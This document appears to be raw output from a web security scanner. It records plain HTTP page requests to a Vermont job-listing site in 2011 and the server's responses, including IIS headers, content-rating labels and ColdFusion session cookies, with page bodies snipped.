CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/global/style/cfmstyle.css HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:12:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT Content-Type: text/css
We're sorry, but a fatal error has occurred (no client variables).
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
Request
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:12:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
